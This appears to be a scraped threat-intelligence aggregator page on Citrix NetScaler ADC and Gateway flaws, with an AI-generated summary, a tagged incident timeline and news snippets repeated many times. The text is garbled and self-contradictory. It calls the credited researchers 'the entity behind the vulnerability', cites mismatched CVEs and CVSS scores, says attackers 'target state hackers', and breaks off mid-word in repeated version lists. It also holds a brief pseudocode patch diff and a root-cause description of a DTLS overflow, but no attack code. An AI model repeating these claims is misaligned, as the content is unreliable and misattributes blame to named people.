INSPECTING ARCHIVED INTELLIGENCE (OUTDATED VERSION).
Citrix Fixes Critical NetScaler ADC and Gateway Vulnerability
| 2026-10-09 08:11 CRITICAL HIGH EXPLOITED VULNERABILITY VULNERABILITY DISCLOSURE
Executive Summary
AI-generated
On October 9, 2026, a critical vulnerability (CVE-2026-107406) was discovered in Citrix NetScaler ADC and Gateway software versions prior to 14.1-73.46 and 13.1-64.29, allowing remote code execution or denial-of-service attacks under specific configuration conditions. The identified entity behind the vulnerability is JPMorgan Chase XOR Team, consisting of Michael Tucker, Chew Keong Tan, and Alex Bernier. This vulnerability affects approximately 100,000 customers worldwide who have NetScaler ADC and Gateway software installed in customer-managed deployments running vulnerable versions. The attack works by exploiting a memory overflow vulnerability that can cause denial-of-service under specific conditions. As of the publication of the bulletin, Citrix is not aware of any unmitigated exploits or attacks in the wild exploiting this vulnerability; however, customers are urged to review the advisory and upgrade impacted NetScaler instances to the recommended versions as soon as possible.
Technical Mitigations AI-generated
• Apply the vendor fix for CVE-2026-19490, CVE-2026-88775 and treat internet-facing systems that were not patched in time as potentially compromised until verified.
Technical Observables Login Required
Indicators of Compromise (IoCs) Protected
Raw threat telemetry, malicious IP addresses, file hashes, and direct VirusTotal correlation are restricted to authenticated users.
cl•••••.random
wa•••••.py
Intelligence Metadata
Actors / Malware / CVEs / Campaigns
CVE-2026-19490CVE-2026-19490
CVE-2026-88775CVE-2026-88775
CVE-2026-88774CVE-2026-88774
CVE-2026-107406CVE-2026-107406
CVE-2026-19489CVE-2026-19489
CVE-2026-88773CVE-2026-88773
CVE-2026-88777CVE-2026-88777
CVE-2026-88778CVE-2026-88778
CVE-2026-88776CVE-2026-88776
CVE-2026-88771CVE-2026-88771
CVE-2026-88772CVE-2026-88772
CVE-2026-88779CVE-2026-88779
CVE-2026-8452CVE-2026-8452
Target & Sectors
NORTH_AMERICA
NORTH_AMERICA
BENELUX
BENELUX
governmentgovernment
Incident Timeline
September 2025
Threat actors exploited a Citrix NetScaler vulnerability that remained unpatched for weeks, starting in September 2025.
August 19
Threat actors used the unpatched Citrix NetScaler vulnerabilities, including CVE-2026-19490, to target state hackers for weeks.
Click on any entity below to view its context and source!
tactic
T1588.006 - Vulnerabilities
The new flaws are not the authentication bypass,
CVE-2026-19490
, that Citrix
fixed on August 19
and that CISA
added
to its Known Exploited Vulnerabilities catalog on September 9.
vulnerability
CVE-2026-19490
The new flaws are not the authentication bypass,
CVE-2026-19490
, that Citrix
fixed on August 19
and that CISA
added
to its Known Exploited Vulnerabilities catalog on September 9.
attribution
Known Exploited
The new flaws are not the authentication bypass,
CVE-2026-19490
, that Citrix
fixed on August 19
and that CISA
added
to its Known Exploited Vulnerabilities catalog on September 9.
2026/08/28
State hackers had exploited a Citrix NetScaler vulnerability that was exposed for weeks after organizations patched the software last month.
September 9
Threat actors exploited a previously unpatched Citrix NetScaler vulnerability, CVE-2026-19490, added to the CISA Known Exploited Vulnerabilities catalog on September 9.
Click on any entity below to view its context and source!
tactic
T1588.006 - Vulnerabilities
The new flaws are not the authentication bypass,
CVE-2026-19490
, that Citrix
fixed on August 19
and that CISA
added
to its Known Exploited Vulnerabilities catalog on September 9.
vulnerability
CVE-2026-19490
The new flaws are not the authentication bypass,
CVE-2026-19490
, that Citrix
fixed on August 19
and that CISA
added
to its Known Exploited Vulnerabilities catalog on September 9.
attribution
Known Exploited
The new flaws are not the authentication bypass,
CVE-2026-19490
, that Citrix
fixed on August 19
and that CISA
added
to its Known Exploited Vulnerabilities catalog on September 9.
September 15
Threat actors exploited the unpatched Citrix NetScaler 13.1 ADC vulnerability for weeks prior to its End of Maintenance on September 15.
Click on any entity below to view its context and source!
infrastructure
13.1
The 13.1 branch also deserves attention because that release line reached End of Maintenance on September 15.
NetScaler 13.1 reached End of Maintenance on September 15 under
Citrix's release schedule
, and Citrix has not said whether it will get one.
general_metric
13.1 NetScaler ADC
The 13.1 branch also deserves attention because that release line reached End of Maintenance on September 15.
NetScaler 13.1 reached End of Maintenance on September 15 under
Citrix's release schedule
, and Citrix has not said whether it will get one.
September 26
Threat actors are actively exploiting two unpatched zero-day vulnerabilities in Citrix NetScaler ADC and Gateway appliances for remote code execution.
Click on any entity below to view its context and source!
tactic
Remote Code Execution
Swati Khandelwal
Sep 27, 2026
Vulnerability / Network Security
Two new unpatched zero-day vulnerabilities in Citrix NetScaler ADC and NetScaler Gateway appliances that allow remote code execution are being actively exploited in the wild, security firm watchTowr said on September 26.
organisation
NetScaler Gateway
Swati Khandelwal
Sep 27, 2026
Vulnerability / Network Security
Two new unpatched zero-day vulnerabilities in Citrix NetScaler ADC and NetScaler Gateway appliances that allow remote code execution are being actively exploited in the wild, security firm watchTowr said on September 26.
organisation
Citrix NetScaler ADC
Swati Khandelwal
Sep 27, 2026
Vulnerability / Network Security
Two new unpatched zero-day vulnerabilities in Citrix NetScaler ADC and NetScaler Gateway appliances that allow remote code execution are being actively exploited in the wild, security firm watchTowr said on September 26.
organisation
Vulnerability / Network Security
Swati Khandelwal
Sep 27, 2026
Vulnerability / Network Security
Two new unpatched zero-day vulnerabilities in Citrix NetScaler ADC and NetScaler Gateway appliances that allow remote code execution are being actively exploited in the wild, security firm watchTowr said on September 26.
general_metric
27 Sep
Swati Khandelwal
Sep 27, 2026
Vulnerability / Network Security
Two new unpatched zero-day vulnerabilities in Citrix NetScaler ADC and NetScaler Gateway appliances that allow remote code execution are being actively exploited in the wild, security firm watchTowr said on September 26.
organisation
NetScaler RCE
watchTowr's first
post on X
on September 26 said it was reacting to rumors of several unpatched NetScaler RCE vulnerabilities in the wild.
September 27, 2026
Threat actors exploited two newly discovered Citrix NetScaler zero-day vulnerabilities before patches were made available, allowing them to remotely execute code.
Click on any entity below to view its context and source!
organisation
NetScaler
Citrix Confirmed Two New NetScaler Flaws Exploited as Zero-Day
Pierluigi Paganini
September 27, 2026
Citrix confirmed two critical NetScaler zero-days were exploited before patches were available, with attackers able to remotely execute code.
Sep 27, 2026
Threat actors exploited a Citrix NetScaler vulnerability that remained unpatched for weeks, allowing state hackers to access the system.
September 27
Citrix published fixes for the two exploited vulnerabilities on September 27.
2026/09/28
Threat actors used the improperly validated input in NetScaler 14.1 build 73.30 to run arbitrary commands, exploiting CVE-2026-88771, and then later updated to use the same vulnerability in build 73.37, also known as CVE-2026-88772.
Click on any entity below to view its context and source!
vulnerability
CVE-2026-88771
As a call back and for consistency with yesterday’s blog post, here is everything the advisory covers:
CVE
Description
CVSS 4.0
Exploited in the Wild
CVE-2026-88771
Improper input validation that lets an unauthenticated attacker run arbitrary commands.
vulnerability
CVSS 4.0
As a call back and for consistency with yesterday’s blog post, here is everything the advisory covers:
CVE
Description
CVSS 4.0
Exploited in the Wild
CVE-2026-88771
Improper input validation that lets an unauthenticated attacker run arbitrary commands.
organisation
Improper
As a call back and for consistency with yesterday’s blog post, here is everything the advisory covers:
CVE
Description
CVSS 4.0
Exploited in the Wild
CVE-2026-88771
Improper input validation that lets an unauthenticated attacker run arbitrary commands.
general_metric
4.0 CVSS
As a call back and for consistency with yesterday’s blog post, here is everything the advisory covers:
CVE
Description
CVSS 4.0
Exploited in the Wild
CVE-2026-88771
Improper input validation that lets an unauthenticated attacker run arbitrary commands.
general_metric
14.1 NetScaler
Vulnerable: NetScaler 14.1 build 73.30
Different
: NetScaler 14.1 build 73.37
Patch Diffing
Contrary to yesterday’s analysis, CVE-2026-88772 does live in
nsppe
, the all-being/all-knowing NetScaler binary.
vulnerability
CVE-2026-88772
Vulnerable: NetScaler 14.1 build 73.30
Different
: NetScaler 14.1 build 73.37
Patch Diffing
Contrary to yesterday’s analysis, CVE-2026-88772 does live in
nsppe
, the all-being/all-knowing NetScaler binary.
infrastructure
14.1
Vulnerable: NetScaler 14.1 build 73.30
Different
: NetScaler 14.1 build 73.37
Patch Diffing
Contrary to yesterday’s analysis, CVE-2026-88772 does live in
nsppe
, the all-being/all-knowing NetScaler binary.
infrastructure
73.30
Vulnerable: NetScaler 14.1 build 73.30
Different
: NetScaler 14.1 build 73.37
Patch Diffing
Contrary to yesterday’s analysis, CVE-2026-88772 does live in
nsppe
, the all-being/all-knowing NetScaler binary.
infrastructure
73.37
Vulnerable: NetScaler 14.1 build 73.30
Different
: NetScaler 14.1 build 73.37
Patch Diffing
Contrary to yesterday’s analysis, CVE-2026-88772 does live in
nsppe
, the all-being/all-knowing NetScaler binary.
organisation
Patch Diffing
Contrary
Vulnerable: NetScaler 14.1 build 73.30
Different
: NetScaler 14.1 build 73.37
Patch Diffing
Contrary to yesterday’s analysis, CVE-2026-88772 does live in
nsppe
, the all-being/all-knowing NetScaler binary.
general_metric
73.30 Different
Vulnerable: NetScaler 14.1 build 73.30
Different
: NetScaler 14.1 build 73.37
Patch Diffing
Contrary to yesterday’s analysis, CVE-2026-88772 does live in
nsppe
, the all-being/all-knowing NetScaler binary.
general_metric
73.37 Diffing Contrary
Vulnerable: NetScaler 14.1 build 73.30
Different
: NetScaler 14.1 build 73.37
Patch Diffing
Contrary to yesterday’s analysis, CVE-2026-88772 does live in
nsppe
, the all-being/all-knowing NetScaler binary.
early in the week of September 28
Threat actors exploited two unpatched remote code execution vulnerabilities in Citrix NetScaler for weeks before patches were expected to be released early in the week of September 28.
Click on any entity below to view its context and source!
tactic
Remote Code Execution
A
follow-up post
at 22:19 UTC gave the fuller account: two vulnerabilities, both remote code execution, both unpatched, exploited before any fix existed, discovered during forensic investigations, and Citrix communications and patches expected early in the week of September 28.
organisation
UTC
A
follow-up post
at 22:19 UTC gave the fuller account: two vulnerabilities, both remote code execution, both unpatched, exploited before any fix existed, discovered during forensic investigations, and Citrix communications and patches expected early in the week of September 28.
2026/09/29
Threat actors exploited CVE-2026-88772 in Citrix NetScaler for weeks, starting from September 29, 2026.
Click on any entity below to view its context and source!
vulnerability
CVE-2026-88772
Today, we're going to be analyzing CVE-2026-88772.
organisation
Citrix NetScaler
Setting The Scene
To fuel today's analysis, we set up a Citrix NetScaler appliance with DTLS enabled (listening on 9462/UDP) and compared two versions using our normal "what the hell has changed" process:
Sep 30, 2026
Threat actors exploited a Citrix NetScaler vulnerability that had been exposed to state hackers for weeks, allowing them unauthorized access.
September 30, 2026
State hackers were exposed to a Citrix NetScaler vulnerability for approximately 8 weeks prior to the incident being reported on September 30, 2026.
2026/09/30
Federal civilian agencies failed to remediate and perform forensic triage of the exposed Citrix NetScaler vulnerability, which was publicly disclosed for weeks prior.
2026/10/01
CISA has set a deadline for federal civilian agencies to remediate and perform forensic triage by September 30, 2026.
Click on any entity below to view its context and source!
attribution
CISA
CISA’s deadline is today.
October 5, 2026
Threat actors successfully exploited a Citrix NetScaler vulnerability that exposed the ADC or Gateway to be configured as an IdP for weeks prior to October 5, 2026.
Click on any entity below to view its context and source!
organisation
NetScaler ADC
Successful exploitation requires NetScaler ADC or Gateway to be configured as a SAML service provider (SP) or identity provider (IdP).
organisation
IdP
Successful exploitation requires NetScaler ADC or Gateway to be configured as a SAML service provider (SP) or identity provider (IdP).
October 7, 2026
The US government's Cybersecurity and Infrastructure Security Agency (CISA) has ordered federal agencies to address a Citrix NetScaler vulnerability that was potentially exposed to state hackers for weeks prior to the October 7, 2026 deadline.
Oct 09, 2026
Threat actors exploited a Citrix NetScaler vulnerability that remained unpatched for weeks, allowing state hackers to access the system.
2026-88779
State hackers have been actively exploiting three different Citrix NetScaler vulnerabilities (CVE 2026-88771, CVE 2026-88772, and CVE 2026-88779) for weeks.
2026-88771
Threat actors used the Citrix NetScaler vulnerabilities (CVE 2026-88771, CVE 2026-88772, and CVE 2026-88779) to target state hackers for weeks.
2026-88772
State hackers have been actively exploiting three different Citrix NetScaler vulnerabilities (CVE 2026-88771, CVE 2026-88772, and CVE 2026-88779) for weeks.
2026/10/09
Threat actors used a memory overflow vulnerability in Citrix NetScaler ADC and Gateway, tracked as CVE-2026-88779, to cause denial-of-service under specific deployment conditions.
Click on any entity below to view its context and source!
organisation
Vulnerability / Network Security
Citrix
Ravie Lakshmanan
Oct 09, 2026
Vulnerability / Network Security
Citrix has
released patches
for yet another critical security flaw impacting NetScaler ADC and NetScaler Gateway that could result in remote code execution or denial-of-service (DoS) under certain conditions.
organisation
NetScaler ADC
Ravie Lakshmanan
Oct 09, 2026
Vulnerability / Network Security
Citrix has
released patches
for yet another critical security flaw impacting NetScaler ADC and NetScaler Gateway that could result in remote code execution or denial-of-service (DoS) under certain conditions.
The company’s
advisory
covers eight vulnerabilities affecting NetScaler ADC and NetScaler Gateway, including remote code execution, HTTP request smuggling, DoS, and security bypass issues.
CVE-2026-107406: Citrix Fixes Critical NetScaler ADC and Gateway Vulnerability.
9.3 Critical
Not reported
CVE-2026-88774
NetScaler ADC and NetScaler Gateway vulnerability.
Citrix confirmed that two critical zero-day vulnerabilities in NetScaler ADC and NetScaler Gateway were exploited before the company released patches.
NetScaler ADC and NetScaler Gateway sit at the edge of enterprise networks, where they handle VPN and remote access, load balancing, and user authentication.
organisation
NetScaler Gateway
Ravie Lakshmanan
Oct 09, 2026
Vulnerability / Network Security
Citrix has
released patches
for yet another critical security flaw impacting NetScaler ADC and NetScaler Gateway that could result in remote code execution or denial-of-service (DoS) under certain conditions.
Citrix has released
security updates
to fix CVE-2026-107406 (CVSS score of 9.5), a critical flaw affecting NetScaler ADC and NetScaler Gateway that could allow remote code execution or denial-of-service (DoS) under certain conditions.
The company’s
advisory
covers eight vulnerabilities affecting NetScaler ADC and NetScaler Gateway, including remote code execution, HTTP request smuggling, DoS, and security bypass issues.
Citrix confirmed that two critical zero-day vulnerabilities in NetScaler ADC and NetScaler Gateway were exploited before the company released patches.
Threat level: Critical
What:
Two unauthenticated remote-code-execution flaws in Citrix NetScaler ADC and NetScaler Gateway, both CVSS 9.5.
NetScaler Gateway adds VPN and secure remote access.
organisation
DoS
Ravie Lakshmanan
Oct 09, 2026
Vulnerability / Network Security
Citrix has
released patches
for yet another critical security flaw impacting NetScaler ADC and NetScaler Gateway that could result in remote code execution or denial-of-service (DoS) under certain conditions.
Citrix has released
security updates
to fix CVE-2026-107406 (CVSS score of 9.5), a critical flaw affecting NetScaler ADC and NetScaler Gateway that could allow remote code execution or denial-of-service (DoS) under certain conditions.
The company’s
advisory
covers eight vulnerabilities affecting NetScaler ADC and NetScaler Gateway, including remote code execution, HTTP request smuggling, DoS, and security bypass issues.
organisation
CVE-2026-107406
Citrix has released
security updates
to fix CVE-2026-107406 (CVSS score of 9.5), a critical flaw affecting NetScaler ADC and NetScaler Gateway that could allow remote code execution or denial-of-service (DoS) under certain conditions.
infrastructure
9.5
Citrix has released
security updates
to fix CVE-2026-107406 (CVSS score of 9.5), a critical flaw affecting NetScaler ADC and NetScaler Gateway that could allow remote code execution or denial-of-service (DoS) under certain conditions.
Recently, the company
confirmed
active exploitation of two other flaws, respectively tracked as CVE-2026-88771 (CVSS score of 9.5) and CVE-2026-88772 (CVSS score of 9.5), on unpatched systems and urged customers to install the relevant updates as soon as possible.
“
Citrix confirmed active exploitation of CVE-2026-88771 (CVSS score of 9.5) and CVE-2026-88772 (CVSS score of 9.5) on unpatched systems and urged customers to install the relevant updates as soon as possible.
Both carry severity scores of 9.5 out of 10 and patches have been released for all of the bugs.
organisation
TCP
These vulnerabilities vary by deployment configuration and enabled features, and include issues that could allow remote code execution, denial of service, HTTP request smuggling, policy bypass, and TCP initial sequence number prediction under specific conditions.”
reads the advisory
.
organisation
DTLS
The second flaw, CVE-2026-88772, is a memory overflow that can lead to remote code execution or denial of service, and it affects appliances with DTLS enabled.
The vulnerability, tracked as
CVE-2026-88772
(CVSS score: 9.5), has been described as a memory overflow bug in the Datagram Transport Layer Security (DTLS) protocol handling that's rooted in the NetScaler Packet Processing Engine (NSPPE).
CVE-2026-88772 is the DTLS memory overflow we walk through here.
It affects appliances with DTLS configuration enabled, which is the default setting on VPN virtual servers.
organisation
NetScaler
In August it
showed
that a NetScaler heap overflow Citrix had patched in June could be used for remote code execution.
Successful exploitation hinges on the NetScaler deployments being configured as a SAML identity provider (IdP) or service provider (SP).
“We strongly urge affected customers to review the advisory and upgrade impacted NetScaler instances to the recommended versions as soon as possible.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA)
added
a Citrix NetScaler flaw tracked as
CVE-2026-88779
(CVSS score of 8.7), to its
Known Exploited Vulnerabilities (KEV) catalog
.
Over the weekend, Citrix rushed out patches for two critical NetScaler zero-day vulnerabilities that have been exploited in the wild.
Datawater reports:
Two critical NetScaler zero-days, CVE-2026-88771 and CVE-2026-88772, were used against organizations worldwide before a patch existed.
The issue, per
watchTowr
, is that NetScaler implicitly trusts the declared fragment size in the DTLS handshake header's fragment_length field (i.e., 1 byte), while the header simultaneously claims that the complete message, as denoted by the length field, is 120 bytes long.
What Is A Citrix NetScaler?
NetScaler, from Citrix (now under Cloud Software Group), is an application delivery controller - some believe it qualifies to be described as a security appliance.
The incident caused alarm online because several private security companies urged customers to take their NetScaler appliances offline on Saturday without providing any evidence of vulnerabilities.
organisation
CVE-2026
CVE-2026-107406: Citrix Fixes Critical NetScaler ADC and Gateway Vulnerability.
Datawater reports:
Two critical NetScaler zero-days, CVE-2026-88771 and CVE-2026-88772, were used against organizations worldwide before a patch existed.
The two zero-days for which
Citrix confirmed exploitation
are tracked as CVE-2026-88771 and CVE-2026-88772.
The disclosure comes a day after the preemptive exposure management company
released
a proof-of-concept (PoC) for CVE-2026-88771, which has been abused alongside CVE-2026-88772 in real-world attacks.
Of the eight, CVE-2026-88771 and CVE-2026-88772 have been exploited, according to Citrix.
The two zero-day issues are not related to NetScaler vulnerabilities CVE-2026-19490 and CVE-2026-19489 that were
disclosed
in August.
organisation
Citrix NetScaler ADC
Threat level: Critical
What:
Two unauthenticated remote-code-execution flaws in Citrix NetScaler ADC and NetScaler Gateway, both CVSS 9.5.
"
The shortcoming has been
addressed
in the versions below -
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releas…
The following versions address the vulnerability:
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releases of 13.1-FIPS…
CVE-2026-88779 is a memory overflow vulnerability in Citrix NetScaler ADC and Gateway that can cause denial-of-service under specific conditions.
Ravie Lakshmanan
Sep 30, 2026
Vulnerability / Network Security
Cybersecurity researchers have disclosed technical details of a recently patched critical security flaw in Citrix NetScaler ADC and Gateway that has come under active exploitation in the wild.
organisation
CVSS
The vulnerability carries a CVSS score of 9.5 out of 10.0.
Both have a CVSS score of 9.5.
The issue carries a CVSS v4.0 base score of 9.5 and is rated
Critical
.”
infrastructure
14.1-73
…samlAction
SAML IdP: add authentication samlIdPProfile
The issue impacts the following versions -
When configured as a SAML IdP -
NetScaler ADC and NetScaler Gateway between 14.1-73.37 and 14.1-73.41, inclusive
NetScaler ADC 14.1-FIPS between 14.1-73.37 FIPS and 14.1-73.41 FIPS, inclusive
NetScaler ADC and NetScaler Gateway between 13.1-64.23 and 13.1-64.28, inclusiv…
"
The shortcoming has been
addressed
in the versions below -
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releas…
The following versions address the vulnerability:
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releases of 13.1-FIPS…
Below are the impacted versions:
NetScaler ADC and NetScaler Gateway 14.1 before 14.1-73.41
NetScaler ADC and NetScaler Gateway 13.1 before 13.1-64.28
NetScaler ADC FIPS before 14.1-73.41 FIPS
NetScaler ADC FIPS and NDcPP before 13.1-37.282
Citrix says it has observed targeted attacks against unpatched deployments that can cause denial of service.
The following versions fix the issue:
NetScaler ADC and NetScaler Gateway 14.1-73.41 and later releases
NetScaler ADC and NetScaler Gateway 13.1-64.28 and later releases of 13.1
NetScaler ADC 14.1-FIPS 14.1-73.41 FIPS and later releases of 14.1-FIPS
NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.282 and later releases of 13.1-FIPS and 13.1-NDcPP
According to
Binding Operational Di…
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.37 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.23 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.37 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.279 and later releases of 13.1-FIPS and 13.1-NDcPP
Introduction to the DTLS Packet
First, some DT…
The same fix is easier to see as C-like pseudocode:
--- nsppe-14.1-73.30 vulnerable
+++ nsppe-14.1-73.37 fixed
@@
copy_saved_header(scratch, saved_header, saved_header_length);
cursor = scratch + saved_header_length;
+space_left = 0x8c00 - saved_header_length;
for (nsb = fragment_chain; nsb !=
In our version of NSPPE (14.1-73.30)
Citrix’s fixes are available in NetScaler ADC and Gateway 14.1-73.37 and later, and in the 13.1-64.23 and later releases.
The builds 14.1-73.32 and 13.1-63.21, which fixed the previously disclosed authentication-bypass vulnerability
CVE-2026-19490
, are still within the affected range for these new flaws.
The feature is available in NetScaler Console service and on-premises deployments with Cloud Connect, starting with version 14.1-73.36, and requires the telemetry channel to be enabled.
Citrix has not said whether appliances on the August builds, 14.1-73.32 and 13.1-63.21, or any newer builds, are affected by the new flaws.
infrastructure
14.1-FIPS
…samlAction
SAML IdP: add authentication samlIdPProfile
The issue impacts the following versions -
When configured as a SAML IdP -
NetScaler ADC and NetScaler Gateway between 14.1-73.37 and 14.1-73.41, inclusive
NetScaler ADC 14.1-FIPS between 14.1-73.37 FIPS and 14.1-73.41 FIPS, inclusive
NetScaler ADC and NetScaler Gateway between 13.1-64.23 and 13.1-64.28, inclusiv…
"
The shortcoming has been
addressed
in the versions below -
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releas…
The following versions address the vulnerability:
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releases of 13.1-FIPS…
The following versions fix the issue:
NetScaler ADC and NetScaler Gateway 14.1-73.41 and later releases
NetScaler ADC and NetScaler Gateway 13.1-64.28 and later releases of 13.1
NetScaler ADC 14.1-FIPS 14.1-73.41 FIPS and later releases of 14.1-FIPS
NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.282 and later releases of 13.1-FIPS and 13.1-NDcPP
According to
Binding Operational Di…
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.37 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.23 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.37 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.279 and later releases of 13.1-FIPS and 13.1-NDcPP
Introduction to the DTLS Packet
First, some DT…
infrastructure
13.1-64
…samlAction
SAML IdP: add authentication samlIdPProfile
The issue impacts the following versions -
When configured as a SAML IdP -
NetScaler ADC and NetScaler Gateway between 14.1-73.37 and 14.1-73.41, inclusive
NetScaler ADC 14.1-FIPS between 14.1-73.37 FIPS and 14.1-73.41 FIPS, inclusive
NetScaler ADC and NetScaler Gateway between 13.1-64.23 and 13.1-64.28, inclusiv…
"
The shortcoming has been
addressed
in the versions below -
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releas…
The following versions address the vulnerability:
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releases of 13.1-FIPS…
Below are the impacted versions:
NetScaler ADC and NetScaler Gateway 14.1 before 14.1-73.41
NetScaler ADC and NetScaler Gateway 13.1 before 13.1-64.28
NetScaler ADC FIPS before 14.1-73.41 FIPS
NetScaler ADC FIPS and NDcPP before 13.1-37.282
Citrix says it has observed targeted attacks against unpatched deployments that can cause denial of service.
The following versions fix the issue:
NetScaler ADC and NetScaler Gateway 14.1-73.41 and later releases
NetScaler ADC and NetScaler Gateway 13.1-64.28 and later releases of 13.1
NetScaler ADC 14.1-FIPS 14.1-73.41 FIPS and later releases of 14.1-FIPS
NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.282 and later releases of 13.1-FIPS and 13.1-NDcPP
According to
Binding Operational Di…
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.37 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.23 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.37 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.279 and later releases of 13.1-FIPS and 13.1-NDcPP
Introduction to the DTLS Packet
First, some DT…
Citrix’s fixes are available in NetScaler ADC and Gateway 14.1-73.37 and later, and in the 13.1-64.23 and later releases.
infrastructure
13.1-FIPS
…samlAction
SAML IdP: add authentication samlIdPProfile
The issue impacts the following versions -
When configured as a SAML IdP -
NetScaler ADC and NetScaler Gateway between 14.1-73.37 and 14.1-73.41, inclusive
NetScaler ADC 14.1-FIPS between 14.1-73.37 FIPS and 14.1-73.41 FIPS, inclusive
NetScaler ADC and NetScaler Gateway between 13.1-64.23 and 13.1-64.28, inclusiv…
"
The shortcoming has been
addressed
in the versions below -
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releas…
The following versions address the vulnerability:
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releases of 13.1-FIPS…
The following versions fix the issue:
NetScaler ADC and NetScaler Gateway 14.1-73.41 and later releases
NetScaler ADC and NetScaler Gateway 13.1-64.28 and later releases of 13.1
NetScaler ADC 14.1-FIPS 14.1-73.41 FIPS and later releases of 14.1-FIPS
NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.282 and later releases of 13.1-FIPS and 13.1-NDcPP
According to
Binding Operational Di…
…Scaler ADC and Citrix NetScaler Gateway 14.1-73.37 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.23 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.37 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1-37.279 and later releases of 13.1-FIPS and 13.1-NDcPP
Introduction to the DTLS Packet
First, some DTLS basics.
infrastructure
13.1-NDcPP
…samlAction
SAML IdP: add authentication samlIdPProfile
The issue impacts the following versions -
When configured as a SAML IdP -
NetScaler ADC and NetScaler Gateway between 14.1-73.37 and 14.1-73.41, inclusive
NetScaler ADC 14.1-FIPS between 14.1-73.37 FIPS and 14.1-73.41 FIPS, inclusive
NetScaler ADC and NetScaler Gateway between 13.1-64.23 and 13.1-64.28, inclusiv…
"
The shortcoming has been
addressed
in the versions below -
Citrix NetScaler ADC and Citrix NetScaler Gateway 14.1-73.46 and later releases
Citrix NetScaler ADC and Citrix NetScaler Gateway 13.1-64.29 and later releases of 13.1
Citrix NetScaler ADC 14.1-FIPS 14.1-73.46 FIPS and later releases of 14.1-FIPS
Citrix NetScaler ADC 13.1-FIPS and 13.1-NDcPP 13.1.37.283 and later releas…
The following versions address the vulnerability:
